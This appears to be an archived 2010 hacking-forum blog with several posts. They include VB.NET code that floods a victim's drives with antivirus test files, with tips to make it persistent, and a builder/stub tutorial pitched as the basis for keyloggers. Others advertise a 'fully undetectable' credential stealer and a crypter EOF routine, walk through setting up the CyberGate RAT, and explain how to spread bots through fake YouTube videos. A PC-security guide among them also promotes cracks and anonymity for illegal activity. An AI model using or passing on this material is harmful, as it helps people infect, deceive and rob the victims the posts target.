Monday, May 31, 2010

[Source] Make Your Victim's AntiVirus Go Mad [VB.NET]

This code will make your victims AV put an alarm every 2.5 seconds.

What it does actually??
Uses loops and get directory to get a random directory in C: drive.
Puts a EICAR ANTIVIRUS TEST FILE(see below) in that location with a random file name.
And lol The AV ShOUTS!
This one happens every 2.5 seconds and the victim gets Frustrated and shouts out "Oh My god!"

The eicar file is one which contains "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" and is exactly 68 or 69 bytes.
It was invented to test antiviruses ie. whether they detect it at realtime.
Any AntiVirus should definitely detect it to be accepted.

Quote: Dim objRandom As New Random(Now.Millisecond)
Dim directory As String
Dim c As Integer
While True
directory = "C:\"
c = My.Computer.FileSystem.GetDirectories(directory).Count
While objRandom.Next(0, 2) = 1
If c > 0 Then
directory = My.Computer.FileSystem.GetDirectories(directory)(objRandom.Next(0, c))
c = My.Computer.FileSystem.GetDirectories(directory).Count
GoTo Create_EICAR
End If
End While
My.Computer.FileSystem.WriteAllBytes(directory & "\" & Rnd() & ".com", System.Text.Encoding.Default.GetBytes("X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"), False)
End While
Catch ex As Exception
End Try

How to Make it worse?
Make the program to open again when closed
Make it auto start.

This Program is Completely Harmless and does not cause any Loss

Sunday, May 30, 2010

(TuT) How To Make A Builder And a Stub!

Hello there! today we are going to make a Builder! and a Stub! I know what your thinking, "Why would i want to do this? i just want to program hacking tools!" truth be told, this is the base for most hacking tools! Want to make a keylogger? Then how would you send the user name and password for the gmail to the other program? the easiest way, is with a builder!

If you get any errors. or dont understand somthing, just post your question, I will be happy to help any and every problem that occurs with my Tutorial.

Note: if you dont understand where a function goes. Either download the source at the bottom, Or just look ahead, i will be posting full page of source as i go along.

Requirements to use this tutorial:
some basic knowledge
Visual Basic Express (or Visual Studio)

Well then, now that we have all that, lets get started!

We are going to make a new project. lets call it "Our Builder".

Make your form look like this

[Image: 2r6lmoo.jpg]

What you will need:
1 Button, name it "Generate"
3 textboxes, name them "UsernameBox", "PasswordBox" and "RandomBox"
4 Check Boxes, name them "AntiDebuggerCB", "AntiSantaCB", "AntiNaziCB" and "AntiEverythingCB"

Good so far, double click the button labeled "MAKE ME!", a you should see somthing like this:

Public Class Form1

Private Sub Generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Generate.Click

End Sub
End Class

Now we need to import System.IO so we don't have to type io.* when we are doing somthing with out files. its just a time saver.
put this on the very top of the code, Above "Public Class Form1"
Imports System.IO

Now lets make our strings, these will go right after "Public Class Form1"

lets make a constant. this will be used so when we split the file on the other side. It tells the command we are going to call later, how to split the file. this needs to be completely unique but still memorable so put this
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"

Now we need some strings! this will hold all our stuff, right now all we need is somthing to hold the stub in. and the strings for the boxes
Dim stub, AntiSanta, AntiDebugger, AntiNazi, AntiEverything As String

Our code so far should look like this:
Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim stub, AntiSanta, AntiDebugger, AntiNazi, AntiEverything As String
Private Sub Generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Generate.Click

End Sub
End Class

As to prevent crashing, lets put all of this inside of a "Try" statement that way, if there is an error. it doesn't just crash. it will tell us the error

Catch ex As Exception
End Try

From here on, everything will go inside the Try statement, that being said, lets open the stub. if you don't know how to do that i'l go through it...if not...i still will

First we need to open our stub:

FileOpen(1, Application.StartupPath & "\sub.exe", OpenMode.Binary, OpenAccess.Read)

heres how this works:.

FileOpen(Reference number, file name including the path, mode to open the file as, Mode Of Access)

Reference number: pick a number, this number will be used to call the file, you will see this more in effect later just make sure you dont use the same number twice. when you get more advanced and get to the point that you are opening more then one file at a time. you want to make sure your not opening the wrong file.

File name including the path: This is the path to the file and the name of the file. just like opening a file it needs to know where to open it, the Application.StartupPath is the path that it was started in, we do this to make sure that even if the file is in some random folder, as long as the stub is in the same folder it will still open it

Mode to open the file as: this is fairly simple. since we are opening a binary file, the mode is binary (I've never needed to use the other modes)

Mode Of Access: there are Read, ReadWrite, Write and Default, we are selecting Read, since we don't need to write to the file right now

Our code so far:

Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim stub, AntiSanta, AntiDebugger, AntiNazi, AntiEverything As String
Private Sub Generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Generate.Click


FileOpen(1, Application.StartupPath & "\sub.exe", OpenMode.Binary, OpenAccess.Read)

Catch ex As Exception
End Try
End Sub
End Class

Next we need to make sure the stubs length is the same as the file

stub = Space(LOF(1))

How this function works:
LOF(Reference number)
The Space(Size) function fills the string with the amount of bytes as the length specified the LOF(File number) function stands for Length Of File. and it does as it says, it gets the Length of the Specified via the files Reference number

So this command makes the "stub" string the same length as the File specified.

Now that that is done. lets get the file and put it into our "stub" string

FileGet(1, stub)
How this code works:

FileGet(Reference Number, String to put file into)
Reference number: should be the number of the file you want to get, because we are getting the file number 1, we will use 1 as the number

String to put file into: this is where we are going to store the file

Now we no longer need the file open so we can close it


How the Code works:
FileClose(Reference Number)
This is rather simple, if you have caught on so far, we are just closing the file 1, since we have stored it in the "stub" string

Our code so far:
Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim stub, AntiSanta, AntiDebugger, AntiNazi, AntiEverything As String
Private Sub Generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Generate.Click


FileOpen(1, Application.StartupPath & "\sub.exe", OpenMode.Binary, OpenAccess.Read)
stub = Space(LOF(1))
FileGet(Reference Number, String to put file into)

Catch ex As Exception
End Try
End Sub
End Class

Awesome! Now the hard part is just gets confusing for some. haha, but don't worry I'll walk you through it.

The way we are passing over our information, I haven't been able to passover anything but strings, (if its possible please tell me)

So we are going to make sure everything that we are passing over is a string

Here is what we are passing over to our stub:
Username (string)
Password (string)
Text in the random box (string)
Check boxes:
anti-debugger (boolean)
anti-santa (boolean)
anti-nazi (boolean)
anti-everything (boolean)

well it looks like we have a small problem, we have 3 items that are ready to be passed over already, however the check boxes are not, as we can not pass boolean values. so lets make some simple code to make sure that we can do this, im not going to explain this. you should get it. im just explaining making the generator. If you have problems with this just post or PM me, I will be happy to help.

If AntiDebuggerCB.Checked = True Then
AntiDebugger = "True"
ElseIf AntiSantaCB.Checked = True Then
AntiSanta = "True"
ElseIf AntiNaziCB.Checked = True Then
AntiNazi = "True"
ElseIf AntiEverythingCB.Checked = True Then
AntiEverything = "True"
End If

Our code so far:
Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim stub, AntiSanta, AntiDebugger, AntiNazi, AntiEverything As String
Private Sub Generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Generate.Click


FileOpen(1, Application.StartupPath & "\sub.exe", OpenMode.Binary, OpenAccess.Read)
stub = Space(LOF(1))
FileGet(Reference Number, String to put file into)

If AntiDebuggerCB.Checked = True Then
AntiDebugger = "True"
ElseIf AntiSantaCB.Checked = True Then
AntiSanta = "True"
ElseIf AntiNaziCB.Checked = True Then
AntiNazi = "True"
ElseIf AntiEverythingCB.Checked = True Then
AntiEverything = "True"
End If

Catch ex As Exception
End Try
End Sub
End Class

OK! now we have everything in string form, lets move on then!

Our next step is to open a new file and save all this information to it. but first, lets make sure that the file isn't there so we don't over write it or cause an error.

If File.Exists(Application.StartupPath & "\Program.exe") Then
File.Delete(Application.StartupPath & "\Program.exe")
End If

You should be able to see what this does. if the file we want to make exists it deletes it, that way we aren't writing over a file. and possibly screwing somthing up

So lets open the file, just as before. except this time. we are going to use the OpenMode.ReadWrite option. insted of OpenMode.Read, that way we can actualy write to the file.

FileOpen(2, Application.StartupPath & "\Program.exe", OpenMode.Binary, OpenAccess.ReadWrite)

Notice that we used a different Reference number. this is because its a different file.

OMG almost done! lets cram alllll this information into this, BUT WAIT! we need to do this a special way. first. note how we save it, as we are not going to have any reference as to what file is what, we have to either remember the order. or copy+paste it some where

So, lets call a FilePut() function (don't let your brain explain it)

FilePut(2, stub & FileSplit & UsernameBox.Text & FileSplit & PasswordBox.Text & FileSplit & RandomBox.Text & FileSplit & AntiDebugger & FileSplit & AntiNazi & FileSplit & AntiSanta & FileSplit & AntiEverything)

I know, your thinking "SLOW DOWN LEG10N! I CAN THINK THAT FAST HOLY SHIT!" just take it one step at a time. and relax :) i'm walking you through it

Heres how the function is called:
FilePut(Reference Number, String to put in the file)

Clearly the reference number is the number of the file we want to write to, and for us, thats 2 so it points to "Program.exe"

But now for the long..... brain blowing.... crotch popping part.... the string.... Dont be scared. This is just like a normal string.

But to combine all our strings into one. We are adding "FileSplit" in between each one, so that we can split it later. so the "&" char is just like before when opening our stub, it takes two strings and combines them into one. we are just putting them in one area so we dont have to dim a string just for that.

Now that that is done, we can close the file


Same as before, just closeting the file since its written.

ZOMG! we are done with the Generator! lets make a message box to congratulate us!


Our full code:
Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim stub, AntiSanta, AntiDebugger, AntiNazi, AntiEverything As String
Private Sub Generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Generate.Click


FileOpen(1, Application.StartupPath & "\sub.exe", OpenMode.Binary, OpenAccess.Read)
stub = Space(LOF(1))
FileGet(Reference Number, String to put file into)

If AntiDebuggerCB.Checked = True Then
AntiDebugger = "True"
ElseIf AntiSantaCB.Checked = True Then
AntiSanta = "True"
ElseIf AntiNaziCB.Checked = True Then
AntiNazi = "True"
ElseIf AntiEverythingCB.Checked = True Then
AntiEverything = "True"
End If

If File.Exists(Application.StartupPath & "\Program.exe") Then
File.Delete(Application.StartupPath & "\Program.exe")
End If

FileOpen(2, Application.StartupPath & "\Program.exe", OpenMode.Binary, OpenAccess.ReadWrite)
FilePut(2, stub & FileSplit & UsernameBox.Text & FileSplit & PasswordBox.Text & FileSplit & RandomBox.Text & FileSplit & AntiDebugger & FileSplit & AntiNazi & FileSplit & AntiSanta & FileSplit & AntiEverything)

Catch ex As Exception
End Try
End Sub
End Class

WHOOO!!!! half done! Yes i know its extremely long, but hey, its detailed!

right about now would be a good time to grabs some food, maybe a drink. pr0n...what ever floats your boat.

On to the Stub, just like before make your Stub form look like this:
[Image: 9hktxt.jpg]

the names are as follows:
three labels for the textbox's text, named "UsernameText", "PasswordText" and "RandomText"
Four labels for the Checkbox's, named "AntiDebuggerText", "AntiSantaText", "AntiEverythingText" and "AntiNaziText"

This time instead of double clicking a button, double click the background. you should see somthing like this:
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub
End Class

now, all of our code is going to go within "Form1_Load", the rest of this will be easy. since we already did it!, The only hard part will be the Split function, well understanding it will be hard for some.

Note: if you have not read the first half, please do so now before continuing

Just like before we need to import System.IO so we dont have to write IO.* infront of what we are doing with the file.
Imports System.IO

this is extremely important! make sure this is EXACTLY as it is in the other side. or this wont work because we are using this as a spacer to tell Split() how to split the string.
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"

And before we can do anything. we need to dim us some new strings, you will notice that we have a new thing here. "Settings()", no its not a function, its a string, to be more specific. this is an array. it can hold more then one string, addressed by a number, just like with the files.

Dim self, Settings() As String

You will notice that this is different. we don't have a button, we are going to do all this while its still starting up. it makes it easier.

Lets open the program. however this time, we are not opening a different file. we are having our program open itself. so instead of typing "Application.StartupPath", since the file could have been renamed, lets type "Application.ExecutablePath" this is the path and the filename to the executable. this makes it alot easyer
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read)
Just as we did in the builder. lets just open this with the Access mode "Read"

And once again. we need to fill the string with the right amount of bytes. if you need to know how this works. please read the first half of this tutorial
self = Space(LOF(1))

now we will get the file. but notice something, this time, we are not getting a different file, we are storing our full EXE in a string why is this you may ask? its simple, when use the FilePut() function we put our Stub into the file, but we put more then that! we added all our information to it didn't we? such as the username and password. and our check boxes! and that is appended to the back of our file!
FileGet(1, self)

Now to close the file.

Our code so far:
Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim self, Settings() As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read)
self = Space(LOF(1))

End Sub
End Class

OK OK this is where i am going to confuse a lot of you, we are going to take our "self" string. and split it up, so that we can use it later.
Settings = Split(self, FileSplit)

Now lets explain how this works, so that you can use this for anything you want.
The function goes as follows:
Split(String to split, Char or string to split by)

So lets say we have a string that says "We Are LeG10N" and we split it by spaces, the function would be:
OurString = Split("We Are LeG10N", " ")

To put it simply. the function finds each space, (" ") and splits it there, to break it down into several strings

After that, OurString now has 3 parts. (0), (1), and (2), this will be hard for a lot of new programmers. seeing as most of us count starting at 1, and not 0, but in the programing world 0 the base number.

OurString now has the following strings
OurString(0) = "We"
OurString(1) = "Are"
OurString(2) = "LeG10N"

And thats exactly how this works for our use, remember how we ordered our FilePut() function? (this is why i said it would be a good idea to copy+paste
Lets review our FilePut() Function.
FilePut(2, stub & FileSplit & UsernameBox.Text & FileSplit & PasswordBox.Text & FileSplit & RandomBox.Text & FileSplit & AntiDebugger & FileSplit & AntiNazi & FileSplit & AntiSanta & FileSplit & AntiEverything)

OK so the way we ordered this. and since we are splitting this massive string into parts via "FileSplit" we should have 8 strings in Settings() and they are as follows

Settings(0) = our stub (this file)
Settings(1) = the text from our username box
Settings(2) = the text from our password box
Settings(3) = the text from our random box
Settings(4) = the string we made for our Anti-Debugger check box
Settings(5) = the string we made for our Anti-Nazi check box
Settings(6) = the string we made for our Anti-Santa check box
Settings(7) = the string we made for our Anti-Everything check box[/qoute]

So for now we can use this as our reference. so that we don't have to think of this like crazy while we are programing.

Now! since we got the hard part out of the way. lets put out Settings() strings to work!

UserNameText.Text = Settings(1)
PasswordText.Text = Settings(2)
RandomText.Text = Settings(3)
This should be clear by now, our username text now equals the text we stored from out username text box in the first program. The same thing for the password text and the random text.

We are almost done! using our reference we made, we can make a if then elseif statement!

'from here on it just requires a little thinking. we just piece together what we know so far. and we test the remaining Settings()
'strings to see if they = "True" like we set them to be if it was checked!
If Settings(4) = "True" Then
AntiDebuggerText.Text = "Hey you cant debug me!"
ElseIf Settings(5) = "True" Then
AntiNaziText.Text = "Good, I dont like Nazi's either"
ElseIf Settings(6) = "True" Then
AntiSantaText.Text = "ZOMG! your going to get coal in your stocking!"
ElseIf Settings(7) = "True" Then
AntiEverythingText.Text = "Well in that case. I'm Anti-you!"
End If

Our Final code for this project:
Imports System.IO
Public Class Form1
Const FileSplit = "--!ZOMG-A-TUTORIAL!--"
Dim self, Settings() As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read)
self = Space(LOF(1))

Settings = Split(self, FileSplit)

UserNameText.Text = Settings(1)
PasswordText.Text = Settings(2)
RandomText.Text = Settings(3)

If Settings(4) = "True" Then
AntiDebuggerText.Text = "Hey you cant debug me!"
ElseIf Settings(5) = "True" Then
AntiNaziText.Text = "Good, I dont like Nazi's either"
ElseIf Settings(6) = "True" Then
AntiSantaText.Text = "ZOMG! your going to get coal in your stocking!"
ElseIf Settings(7) = "True" Then
AntiEverythingText.Text = "Well in that case. I'm Anti-you!"
End If

End Sub
End Class

HOLY PROGRAMMER BATMAN! WHERE DONE! haha, good work! you finished a Builder and a stub!

[Source] BlackCrow Stealer V2

So here it is:

[Image:  deca.png]


  • Steals FireFox 3.X.X
  • Steals Msn
  • Steals Msn Messenger
  • Steals Outlook
  • Steals Protected Storage
  • Steals Internet Explorer
  • Steals No-IP
  • Steals Pidgin
  • Steals FileZilla
  • Steals IMVU
  • Completely FUD
  • RunPE!


Download Here!

.dlls - compile them then add them as a reference to the stub
Download Here!
[VB.NET] EOF - End Of File

Hello everyone. This is little source of EOF i found on spam. The credits go to linky and it worked for me fine. Hope it will work for you good too, if you have problem i will try to help you to fix it.

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer)

Function GetEOF(ByVal Path As String) As Long
Dim ByteArray() As Byte
Dim PE As Long, NumberOfSections As Integer
Dim BeginLastSection As Long
Dim RawSize As Long, RawOffset As Long

FileOpen(10, Path, OpenMode.Binary, OpenAccess.Default)
ReDim ByteArray(LOF(10) - 1)
FileGet(10, ByteArray)

Call CopyMemory(PE, ByteArray(&H3C), 4)
Call CopyMemory(NumberOfSections, ByteArray(PE + &H6), 2)
BeginLastSection = PE + &HF8 + ((NumberOfSections - 1) * &H28)
Call CopyMemory(RawSize, ByteArray(BeginLastSection + 16), 4)
Call CopyMemory(RawOffset, ByteArray(BeginLastSection + 20), 4)
GetEOF = RawSize + RawOffset

End Function

P.S. Its useful if you making an crypter.... for more informations click following link.

Saturday, May 29, 2010

The Ultimate Guide to PC Security

Written for

Referrer = Ryoushi

Being a hacker, you're coming face to face with some of the most malicious programs on the internet every day. You want to be secure. Most of the programs you'll be downloading will be malicious, so how can you tell if the program will be working against you or for you?
This guide will be looking at the scanning of malicious files, as well as a guide to anti-viruses & firewalls and a brief introduction to sandboxing and anonymity. So yep, you're in for quite a bit of reading. Grab a drink, maybe a cigarette.

Being secure is important. Just because you call yourself a hacker, it doesn't mean you're immune to attacks towards your computer. Without my anti-virus, I doubt I'd actually be typing this now - I'd probably be searching through my registries and screaming like a chicken on speed. I'm like that.
Not all anti-viruses work the same way. Some anti-virus programs are bad; some are good, and some are just plain useless. We'll be looking at which ones are the best of the best, and which ones are just plain fail.
Being infected with something can also put your friends and family at risk, other users of your computer could be having their login & credit card details stolen without any knowledge of it. Worms can also spread to your email contacts and friends on popular websites such as Facebook.

Downloads & Scanning
For example, you download a program and the poster is claiming that it is a clean botnet controller. If we can this, it will come up with results such as "Win32/RBot" etc.. This means that the file should be what we wanted.
Now, if the botnet-controller scan came up as something like "Win32/trojan.agent.a", we can tell that this is a malicious program that will work against us. This is an example of a download you do not want to use.
All in all, the scan should show results similar to what you were downloading.
You should always be careful what you download. You may often be downloading malicious software without even realizing sometimes. Trust me, this happens to a lot more people than you think.
If you're expecting a file to be much bigger than the download you find, don't touch it. An example of this would be "Windows XP Theme - 350kb!" when it should be a lot higher, such as 30-50mb.
Remember to always check the names of the files you download.. If you're downloading a cracked program, it would be unusual for it to have no credits or advertisements in it. I would trust " 'x' cracked by 'y' " more than I'd trust " 'x' crack". Credits, names or advertisements should nearly always be in .rar or .zip files, this is one good way of recognizing a trusted download.
Here is a quote from Wikipedia which you may find helpful: "Example: contains a crack to register ZtreeWin 1.51 included files are: keygen.exe, one.nfo, file_id.diz and 'RUN.EXE'. It is the 'RUN.EXE' that contains the rogue program"
Downloading really isn't necessary and is often risky, but we have some clean content in the HF-L33t section if you want to upgrade for that. ;)

Online File Scanners
Web-scanners such as "VirusTotal" and "NoVirusThanks" are becoming increasingly popular with the amount of anonymous downloads posted all over the internet.
If you want to scan a file you find suspicious, you can go to either or to do so.
VirusTotal will send samples of the file to the antivirus companies, so this is not recommended if you want to keep your file undetectable.
NoVirusThanks has an "Advanced options" area where you can choose to not distribute your file to the antivirus companies, this is handy for keeping things fully undetectable, but if it's a file you don't trust and don't want yourself or others to be infected by it in the future, I suggest you allow them to distribute it to the antivirus companies. I respect what these websites and the malware fighting websites do, and so should you.

Visiting Websites & Reading Emails.
Be cautious of the websites you visit. I wouldn't recommend visiting any websites that seem cheap, uncommon, or freely hosted. Malicious websites are often misleading or can just inject things into your system without your consent. If you use the "Chrome" browser from Google, you may have noticed that it automatically downloads files without prompting you. Chrome is a browser I would not recommend just because it is so new, all new things have vulnerabilities, and if a vulnerability can be exploited, it will be exploited.
I'm behind a firewall and anti-virus anyway, but the only websites I visit are popular ones. The untrustworthy and uncommon websites usually don't appeal to me, for obvious reasons..
When opening emails, you should also be cautious. Just because it's an email from your friend - it doesn't mean you can trust it! You may see some emails asking you to update your bank details -- your banks should never ask you to do that via email. The details you enter will be sent out to someone who is going to exploit your details, so steer away from these emails.
Worms can be spread via email. For example, you open an email from Bob containing a worm, this worm is then sent to all of your contacts. This is how most worms will work, and it is suggested that you change your emailing service if it could be vulnerable. You can use Microsoft's live hotmail service which is excellent, it will also disable any harmful content from downloading onto your computer. You can find this service at

By using a sandbox, everything that is downloaded onto your computer will remain in the sandbox. It will not escape, meaning that malicious downloads cannot harm your computer. Sandboxing is a great way to test whether or not a website can be trusted. I rarely do this, but it's so useful sometimes.
Sandboxing will also protect your cookies, history and cached temporary files from being leaked. Downloads are isolated, meaning that they are trapped and your computer is protected.
Here is a download I posted for Sandboxie v3.30:

The good antiviruses will have a built-in Firewall, but if not, then it may be worth downloading one. Firewalls aren't essential, but can help a lot.
Some firewalls have IP masking options, but these can usually slow down your computer and are not worth using unless you're doing something illegal.
The main use of a firewall is to prevent incoming traffic, which will stop things like 'telnet' from reaching your connection, and can also stop worms etc. from accessing your network. Firewalls will also block the backdoors that trojans create, so if you find yourself unlucky enough to have a RAT (Remote Access Trojan) on your computer, the backdoor should be blocked by your firewall, but it is possible for a trojan to bypass this. Having a firewall does not mean you are secure, many firewalls can be easily disabled or bypassed by malware. Some firewalls will also block legit connections, such as downloads for software. Do not think you're secure just because you have a firewall, this is a common misconception with firewalls. Too many people think that by installing a highly popular firewall, they'll instantly be secure against the latest intrusions, but this is not at all true.
Firewalls may also make an effect on your connection speed. If you have a very fast download speed, you may notice a difference when you get a firewall, but the download speed may remain normal on users with slower speeds. This effect can vary between users, and depends on the connection. It's best to try several firewalls to find out which one suits you best - reviews are personal and will not always be the same for everyone.
One of the favourite firewalls is "ZoneAlarm" which is very popular and has a free version. The paid version is obviously better, but it isn't necessary at all.
If you're using Windows Vista, I'd recommend choosing ZoneAlarm as your firewall. The same goes for XP, but you might want to get your hands on a "BlackIce" crack instead, if possible.
Another great Firewall is "Comodo" which is also free can be found here...
Zone Alarm:

An anti-virus program is essential. You honestly shouldn't go without one. If you don't have one, there is a list of downloads and recommendations in the next post. Don't be worried about the anti-virus slowing down your computer, if you get the right one then your computer will remain at maximum performance.
You want an antivirus that will scan your RAM and system folders constantly, because then you will be alerted if something harmful has been found in them. The average antivirus will only scan and remove when told to, but the best ones will scan constantly, update daily, and give plenty of tweaking options to fit to your preferences.
If there are malicious programs that you want to download such as Metasploit, it is best if you have an antivirus that will allow you to do so. Some antivirus programs will give you no option and will quarantine the file straight away, but others such as Kaspersky will give you the option to clean, remove or ignore.
Viruses can sometimes fully disable your protection, but the stronger programs such as Nod32 can withstand this and will be unclosable. You want something tough if you're going to be downloading riskware.
A good anti-virus will also constantly scan your downloads and running processes. Hopefully you are able to understand now why these are essential.
If you want to run more than one antivirus, you must find a combination that works. If you have a good antivirus, you won't need to. Infact, you shouldn't ever need to run more than one. I remember having Kaspersky running while I installed Nod32, my PC growled. :3 The only antivirus-related programs I have installed at the moment are HijackThis, ComboFix and NOD32. I like to use HijackThis to see what's running on my computer, and I always keep ComboFix just incase, you never know what's round the corner...
I remember having no antivirus software installed whatsoever, and then I received a rootkit that wouldn't let me download any software.. I got rid of them eventually, but it wasn't easy, the rootkit wasn't detected by most AV's because of it being so new/rare - you still can't find it on a few of the AV databases! But I do wish I had it again, so I could send it out as a sample.
I will be listing my favourite anti-viruses in my next post. I strongly recommend you stick to these, as there are many fake ones that you can be easily lead to. Remember to look things up before downloading them. Pick wisely! :3

The Top 5 Anti-virus Programs.
Here's the list of my top five favourite anti-virus programs in order.
You can pick which you want from each picture, but I'd recommend Kaspersky.

Downloads & keys -

Crack (Doesn't get updated) -
Logins for legit version -
(Legit version available at

Avast also has skins available, which is great!
Free download:

Free downloads:

Credits to Goodkidz for the download.

Essential Additions.
There's a few more tools which I'm sure you'll definetely want to get.
HijackThis is a tool used to scan the areas of your computer which viruses are often located in. It will also scan the registry areas which hold the legitimate programs and, quite often, the infections. It is best not to delete ('fix checked') any entries on HijackThis unless you know what you're doing, as you may be removing something which is a required part of your system.
Another good thing about HijackThis is the fact that it's so lightweight, it uses barely any memory, it's easy to use, and you don't need to keep it running!
This is a great area to check if a process is harmful or not:
HijackThis can be found here:

Browser Protection
There are several great addons for browsers which you can get to protect you from malicious websites.
If you use FireFox, look for "WOT" and "NoScript", WOT will give warnings before you visit a website, and NoScript will disable malicious scripts from running when you visit a website.
If you use Internet Explorer, look for "IE-Spyad", IE-Spyad will redirect you away from malicious webpages and guard you from over 5,000 different URL's.
I'm also working on my own plugin, which you can expect to see in a few months. This will be for IE only, until I fully figure out how FireFox operates.

Okay, now that you're protected (well, I hope you are), it's time to be invisible...

IP Hiders
You can get some great IP hiders to keep you anonymous.
A personal favourite is "Hide-The-IP", which allows you to select the proxy and choose the speed of the one you want.
Hide-The-IP can be found here: - Though you may need to find a crack for it!
There are many fabulous IP hiders out there which can be found, and these are a must if you're going to be involved in any illegal activity.

Tor: Anonymity Online
You may want to download "Tor" and TorButton for FireFox. This is a program which will select a proxy for you and allow you to spoof your connection by using that.
TorButton is a FireFox addon which allows you to change your proxy quickly by clicking the button. This is a great tool, and another good reason to download FireFox!
The whole Tor website with information & downloads can be found here:

Alright, grab another cup o' coffee, 'cause we've still got more to do..

Personal Details
Okay, you may want to give out your name and things on your Facebook or MySpace, but if you do, it's wise to use an alternate alias. If someone searched your hacking alias in Google, they'd probably be able to pick up a lot of information on you from that. Think about the name you choose before you choose it, and make sure you don't over-use it - only use it where you think you should. Don't complain about not being anonymous if you're going to splurt out your details everywhere, you can't expect to stay hidden if you're going to give yourself away without realising. Remember that.

Keeping Software Updated
Software should always be kept updated. This is vital. Most security experts will tell you that updating your software is more important than having an antivirus, because malware finds flaws and vulnerabilities in software that it can exploit.
This is what should always be kept fully up to date:
Your operating system (e.g. updating from Windows XP SP1 to SP2).
Instant messaging or email applications.
Any other software which could be exploited.
Zer0man showed me this lovely website with scanners you can use to check for out-of-date software...
Here's the online version:
And the downloadable version:
Quite obviously, the downloadable version scans for more vulnerabilities than the online version, and it includes more features. This is a great tool to use every few weeks, since you never know what's around the corner ;-)

Active Thinking
Many scams and computer infections require your consent, so you should always be wary. If something doesn't quite look right, make sure to research it. Many people are fooled into giving away their details by fake emails from companies such as banks, social networking websites, etc. You shouldn't believe everything you read. Many scams will lead you on, so you just have to watch out. Keep everything you've learned from this guide in mind, and you'll be safe.
A good quote from The Real Hustle: "If it looks too good to be true, then it probably is".

Though it is also important to have a password you will remember, you should also be sure that it can't be guessed. If it's a site containing personal information, I suggest you change your password once a month. A good password would contain letters, numbers and symbols - maybe even words in a foreign language if it helps! An example of a good password would be "A$fao4iz3£p" not "John1982" or "ilovefootball". Passwords should be different for each website you use, because if someone hacked into a forum, for example, and took your details - potentially, they could have access to your PayPal account, Facebook, etc.

Well, you should know just about everything you need to know by now. If there's anything else you're wondering, don't hesitate to ask! I will be here for any questions, feedback or suggestions. This guide should keep you well-hidden and protected from now on, just remember to keep everything in mind!

[TuT]Setup Cybergate RAT v1.02.0+Portforwarding+Pictures

++++**Creating Cybergate RAT's for people for free**++++

+ - + - + Go Here for a free FUD crypter that supports CyberGate! + - + - +
+ - + - + ~Credits to Modern Haxor 2 for the free crypter! + - + - +

-Files needed:
+ ( Cybergate 1.02.0 )
+ (No-Ip client )
+ ( PFPortChecker )

No-Ip client + hostname

1) Go here and make an account.

2) Click the Home tab in the top right
[Image: picture1edited.jpg]

It should bring you to this page.
[Image: picture2ts.jpg]

3) Click on "Add Host"
[Image: picture3os.jpg]

4) Fill in the options
+ Hostname: (Make it like, myfirstrat or your hackforums username)

Leave the rest of it as default
It should look something like this
[Image: picture4wt.jpg]

5) Download no-ip client here

6) Open up your no-ip client, log-in with the information from the website and then click the box by your
[Image: picture8q.jpg]

Your done with now.

Setting up cybergate rat v1.02.0

1) Download Cybergate v1.02.0

2) Extract it to your desktop or preferred area.

3) Start Cybergate

4) Go to "Control Center--> Start"
[Image: picture5i.jpg]

5) Now go to "Control Center--> Builder--> Create Server"
[Image: picture6kf.jpg]

6) Click "Add" to create a new Server Builder Account
[Image: picture7n.jpg]

7) Double click on the account you added or left click then go to the bottom left of the box and click "Forward -->"

8) In the credentials box for Identification put your log-in name and for password put your password then click "Add"

9) When a box pops up asking for something like the example "". Put your information like this -- IT SHOULD MATCH WHATS ON YOUR NO-IP CLIENT!!! (This sets your port to 82, which we will open that port up later)
[Image: picture9jf.jpg]

10) Watch this video on how to setup your server for cybergate here
~Video made by me

11) Go to "Control Center--> DNS Console" and fill out the box like how mine is.
[Image: picture10e.jpg]

12) Go to "Control Center--> Options--> Select Listening Ports" and fill it out like mine.
[Image: picture11ly.jpg]


Port forwarding.

go there and find your router and follow the instructions to open PORT 82

(TuT) How To Spread Your Bot via YouTube

The place to spread is YouTube

- Why YouTube?

- Because there are thousands of noobs searching for all kind of weird stuff for free 24/7.
- Because it is very easy to spread it on youtube.
- And last: You can remain sleeping while getting your victims.

Tools needed:

- Brain
- Internet


- A Crypter (So smarter victims won't detect it as a virus.)
- A binder (If you wan't to make your victims more convinced.)
- And last on the extra list: A fake program

So how is it done?

The things you have to remember when publishing a video is:

- Create a believable video (Feel free to use my videoes) - Just send me a PM. But I don't like when people just copy my video off YouTube and upload it on their own accounts. (Which has already been done a couple of times.)

- Try to convince your watcher that this IS working. Show proofs, and everything you can think of.
- Important: Make a good name for it. Something that a lot of youtube users will search for, and make it special so it's easier to get victims.
- Also, for the extra, you can put a fake virusscan or a real one where you scan your crypted file.
